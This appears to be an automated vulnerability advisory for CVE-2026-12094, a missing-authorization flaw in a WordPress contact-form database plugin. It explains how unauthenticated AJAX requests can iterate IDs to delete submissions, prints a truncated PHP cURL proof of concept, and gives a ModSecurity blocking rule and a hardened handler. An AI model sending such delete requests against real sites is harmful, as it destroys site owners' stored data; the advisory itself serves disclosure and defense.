Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: June 23, 2026

CVE-2026-12094: Advanced Contact Form 7 <= 1.0.0 Missing Authorization to Unauthenticated Arbitrary Contact Form Submission Deletion via 'form_id' Parameter PoC, Patch Analysis & Rule

Severity: Medium (CVSS 5.3)
CWE: 862 (Missing Authorization)
Vulnerable Version: 1.0.0
Patched Version: none listed
Disclosed: June 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-12094 (metadata-based):

This vulnerability affects the Advanced Contact Form 7 – Compact DB plugin (slug: advanced-contact-form-7-compact-db) version 1.0.0. It allows an unauthenticated attacker to delete arbitrary contact form submission entries stored in the plugin's custom database table. The CVSS score is 5.3 (Medium), with vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N, indicating no confidentiality impact but low integrity impact.

The root cause is a missing authorization check in the function `cf7cdb_ajax_delete_user()`; the CWE classification of 862 (Missing Authorization) confirms this. The function is registered as an AJAX handler for both authenticated (`wp_ajax_cf7cdb_delete`) and unauthenticated (`wp_ajax_nopriv_cf7cdb_delete`) users. The description confirms that the handler performs no nonce verification, no capability check, and no ownership check before calling `$wpdb->delete()` on the `wp_cf7cdb_data` table with an attacker-supplied integer ID. Without source code, Atomic Edge's inference is that the function simply takes the `form_id` parameter (likely a POST parameter named `form_id` or similar) and uses it directly in a delete query without validating the user's permissions or ownership of the record.

An unauthenticated attacker can exploit this by sending a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `cf7cdb_delete` and a numeric `form_id` parameter. The attacker can enumerate sequential primary-key IDs to delete any submission stored in the plugin's database: only the value of `form_id` needs to be iterated (e.g., 1, 2, 3, …). No authentication is required and there is no nonce to bypass, so the attack is straightforward and requires no special privileges.

To remediate this vulnerability, the developer must implement proper authorization:
1) Add nonce verification using `wp_verify_nonce()` with a unique action name.
2) Check that the current user has the appropriate capability (e.g., `manage_options` or a custom capability) before allowing deletion.
3) Verify that the submission being deleted belongs to the current user, if submissions are intended to be user-owned.
4) Remove the `wp_ajax_nopriv_*` hook registration if the action should only be available to authenticated users.
The fix is standard WordPress security practice.

If exploited, an attacker can delete any contact form submission records stored by the plugin. This could result in loss of data, including potentially important user inquiries, feedback, or order information submitted through Contact Form 7. While the CVSS score indicates low integrity impact, the ease of exploitation (unauthenticated, no specialized network access) increases the real-world risk: an attacker can systematically delete all stored submissions by iterating through IDs, causing data loss and potential disruption to site operations.

Proof of Concept (PHP)

The published PoC is cut off after its second comment line; the lines that define $target_url, $action and $form_id are missing from the page, and the surviving fragment is reproduced as published.

// Atomic Edge CVE Research – Proof of Concept (metadata-based)
// CVE-2026-12094 – Advanced Contact Form 7 $action,
    'form_id' => $form_id
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded'
));

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output result
if ($http_code == 200) {
    echo '[+] Successfully sent delete request for form_id: ' . $form_id . PHP_EOL;
    echo '[+] Response: ' . $response . PHP_EOL;
} else {
    echo '[-] Request failed with HTTP code: ' . $http_code . PHP_EOL;
}

ModSecurity Rule

# Atomic Edge WAF Rule – CVE-2026-12094 (metadata-based)
# Block unauthenticated AJAX delete requests for Advanced Contact Form 7 Compact DB plugin
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:20262094,phase:2,deny,status:403,chain,msg:'CVE-2026-12094 – Advanced Contact Form 7 Ajax Delete Exploit',severity:'CRITICAL',tag:'CVE-2026-12094'"
    SecRule ARGS_POST:action "@streq cf7cdb_delete" "chain"
    SecRule ARGS_POST:form_id "@rx ^\d+$"

Because the vulnerable handler is registered for both the authenticated and the unauthenticated hook, an administrator's legitimate delete and an anonymous one arrive as the same POST, and this rule blocks both; it is a virtual patch to hold until the plugin itself enforces authorization.
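A hardened replacement for the AJAX delete handler that applies the remediation steps from the analysis above, added here as an example and not code from the plugin or from Atomic Edge. The table name `cf7cdb_data` under the site prefix, the primary-key column `id`, the nonce action name `cf7cdb_delete_nonce`, the `nonce` POST field and the `manage_options` capability are assumptions.

```php
<?php
// Added example (not the plugin's own code): hardened AJAX delete handler.
// Assumptions: table $wpdb->prefix . 'cf7cdb_data' with primary key 'id',
// nonce action 'cf7cdb_delete_nonce' sent in POST field 'nonce' (created on
// the admin page with wp_create_nonce('cf7cdb_delete_nonce')), and deletion
// restricted to users holding 'manage_options'.

// Register only the authenticated hook. With no wp_ajax_nopriv_* registration,
// anonymous requests never reach the handler (admin-ajax.php answers "0").
add_action( 'wp_ajax_cf7cdb_delete', 'cf7cdb_ajax_delete_user_hardened' );

function cf7cdb_ajax_delete_user_hardened() {
    // 1) Nonce check: rejects requests not originating from a page that carries
    //    a nonce for this action (CSRF protection). The third argument (false)
    //    makes the function return instead of die(), so we can send JSON.
    if ( ! check_ajax_referer( 'cf7cdb_delete_nonce', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // 2) Capability check: only users allowed to manage the site may delete.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3) Strict input validation: form_id must be a positive integer.
    $form_id = isset( $_POST['form_id'] ) ? absint( wp_unslash( $_POST['form_id'] ) ) : 0;
    if ( $form_id < 1 ) {
        wp_send_json_error( array( 'message' => 'Invalid form_id.' ), 400 );
    }

    global $wpdb;
    $table = $wpdb->prefix . 'cf7cdb_data';

    // 4) Confirm the record exists, using a prepared statement. If submissions
    //    were per-user, an ownership check (owner column vs. get_current_user_id())
    //    would be added here as well.
    $exists = $wpdb->get_var( $wpdb->prepare( "SELECT id FROM {$table} WHERE id = %d", $form_id ) );
    if ( null === $exists ) {
        wp_send_json_error( array( 'message' => 'Submission not found.' ), 404 );
    }

    // Typed WHERE format (%d) binds the ID strictly as an integer.
    $deleted = $wpdb->delete( $table, array( 'id' => $form_id ), array( '%d' ) );
    if ( false === $deleted ) {
        wp_send_json_error( array( 'message' => 'Database error.' ), 500 );
    }

    wp_send_json_success( array( 'deleted_id' => $form_id ) );
}
```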
